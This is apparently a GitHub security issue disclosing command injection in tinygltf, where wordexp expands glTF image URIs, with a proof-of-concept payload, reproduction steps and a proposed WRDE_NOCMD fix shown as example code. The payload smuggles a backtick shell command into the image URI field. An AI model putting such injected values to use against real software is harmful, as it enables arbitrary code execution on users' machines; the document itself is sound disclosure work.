
Command injection via wordexp call. #368

@oliverchang

Description

Describe the issue

This is a security vulnerability. The wordexp call here allows arbitrary code execution

int ret = wordexp(quoted_path.c_str(), &p, 0);
when parsing a gltf file.

To Reproduce

  • OS: Linux
  • Compiler, compiler version, compile options: Clang 13.0.1-6
$ git clone https://github.com/syoyo/tinygltf
$ cd tinygltf && make all
$ echo '{"images":[{"uri":"a`echo iamhere > poc`"}], "asset":{"version":""}}' > payload.gltf
$ ./loader_example payload.gltf
$ cat poc
iamhere

Expected behaviour
The echo iamhere > poc command should not be executed, and the poc file should not be created in the CWD.

Additional context
This was found by OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053

One potential fix here is to pass WRDE_NOCMD to wordexp per https://man7.org/linux/man-pages/man3/wordexp.3.html
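As an added example (not part of this issue and not tinygltf's own code), a helper that applies the proposed WRDE_NOCMD flag: a URI carrying a backtick or $(...) command substitution is rejected with WRDE_CMDSUB instead of being handed to a shell, while an ordinary relative image path still expands. ExpandResult and ExpandPathSafely are hypothetical names.

```cpp
#include <wordexp.h>

#include <string>
#include <vector>

// Outcome of expanding one glTF image URI (hypothetical helper type).
struct ExpandResult {
  int rc;                          // wordexp() return code, 0 on success
  std::vector<std::string> words;  // expanded words, filled only when rc == 0
};

// Hypothetical replacement for the loader's wordexp(..., 0) call.
// WRDE_NOCMD makes wordexp() refuse command substitution: a URI such as
// a`echo iamhere > poc` or a$(...) yields WRDE_CMDSUB and nothing is run,
// even when the URI is wrapped in double quotes. Unquoted shell
// metacharacters (| & ; < > ( ) { }) yield WRDE_BADCHAR.
// Variable, tilde and glob expansion still take place, so the input is
// still interpreted; WRDE_NOCMD only closes the code-execution path.
ExpandResult ExpandPathSafely(const std::string &path) {
  ExpandResult r{};
  wordexp_t p{};
  r.rc = wordexp(path.c_str(), &p, WRDE_NOCMD);
  if (r.rc == 0) {
    for (size_t i = 0; i < p.we_wordc; ++i) {
      r.words.emplace_back(p.we_wordv[i]);
    }
    // Release the expansion only after a successful call.
    wordfree(&p);
  }
  return r;
}
```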
